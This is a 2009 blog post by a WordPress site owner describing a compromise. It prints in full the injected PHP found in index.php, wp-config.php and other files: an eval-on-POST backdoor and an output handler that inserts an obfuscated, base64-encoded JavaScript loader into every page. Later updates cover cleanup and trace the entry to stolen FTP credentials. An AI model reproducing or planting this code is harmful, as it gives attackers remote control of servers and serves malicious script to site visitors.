Yesterday my blog was hacked (most likely), some strange code was written to index.php, wp-settings.php and wp-config.php as well as some files in folder wp-includes. I Googled the line of code and it seems like many WordPress blogs running version 2.7.1 has been hacked in the last few days.

The code that was written on lineĀ 1 of the files:

if(!function_exists(‘tmp_lkojfghx’)) {if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]); if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5nd WFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKH VuZXNjYXBlKCclM0N5aHNkQzNjeWhyMkd pcHQlMjBzcmN5aCUzRCUyRlRNJTJGOVhwd jQlMkUyNDdkQzMlMkVUTTIlMkVYcHYxS2 U5VE01JTJGalJpN3FkQzN1ZEMzZVJpN3J 5ZEMzJTJFanMlM0V5aCUzQyUyRnloc2M3 SzJyaXB0eWglM0UnKS5yZXBsYWNlKC9kQz N8WWlmfHlofFJpN3xLZXxUTXwyR3w3SzJ8 WHB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg==’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8)); if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v) if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)|| preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’))) || ($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s); }$s1=preg_replace(‘#<script language=javascript> <!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’) || stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’]) call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’) return;else $s[]=array($a==’default output handler’?false:$a); for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’); for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}} if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2();

I hope they come up with a patch soon, because I think this is a WordPress vulnerability, and nothing to do with any webhotel or PHP hacks, but it’s hard to say for sure at this point. What I did to fix it was to re-upload those 3 files and the whole wp-includes directory all over again, and I got access again. Then I suppose one better change database passwords etc.

Update #1: I also found an index.php file under wp-content/uploads which contained the above code and a comment “Silence is golden”.

Update #2: The file described in update #1 should perhaps be there, with the comment, but there should be no php code in it. I still have no information about how this hack was performed and what it does, but it is likely that the problem is in one of the plugins rather than WordPress itself.

Update #3: Today (2009-04-06) I got the logs from Loopia, my webhotel, and it shows that the hack was performed via FTP and replaced some of the files on my account from an IP-address located in Norway, most likely via some VPN service. There was some other sites of mine that also got some strange javascript inserted into them, and those pages are now also replaced with the original ones. I have notified Loopia about the incident and alerted them to the possibility that the hack might be not only on my account but rather their customer database. The hack seemed to be very automatic anyway, and I have now changed passwords etc.

Update #4: I noticed that another site of mine, on another webhotel, has also been hacked in the exact same way. So it would seem I’ve gotten some spyware on my computer stealing FTP passwords. So, now atleast I know it’s probably all my fault, too much porn perhaps… Computer will be re-installed tomorrow and all passwords changed.

I post updates when I know something more about what happened and why.